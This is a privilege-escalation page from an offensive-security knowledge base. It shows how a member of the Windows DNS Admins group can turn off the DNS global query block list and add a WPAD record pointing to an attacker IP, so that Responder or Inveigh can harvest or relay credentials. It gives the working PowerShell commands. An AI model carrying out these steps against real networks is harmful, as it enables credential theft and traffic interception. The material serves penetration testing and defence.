Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Groups / DNS Admins

WPAD Record Abuse

The Windows DNS Server Global Query Block List prevents resolution of selected hostnames—most notably WPAD, which is commonly targeted for hijacking.

WPAD (Web Proxy Auto‑Discovery Protocol) is a legacy mechanism that lets Windows automatically discover a proxy server on the network. Because of how it performs name resolution, it has become a high‑value abuse vector in both enterprise security and offensive testing.

When the objective is credential harvesting or relay attacks rather than executing a DLL, DNS Admin privileges can be leveraged to exploit WPAD.

Disable the global query block list:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <DC>

The block list prevents DNS from resolving dangerous, collision‑prone names such as:

  • WPAD
  • ISATAP

These names are blocked because they can be hijacked and used for credential theft, traffic interception, or misrouting.

Create the WPAD record:

Add-DnsServerResourceRecordA -Name wpad -ZoneName <domain.local> -ComputerName <DC> -IPv4Address <attacker_ip>

Then use a poisoning/relay tool such as Responder or Inveigh.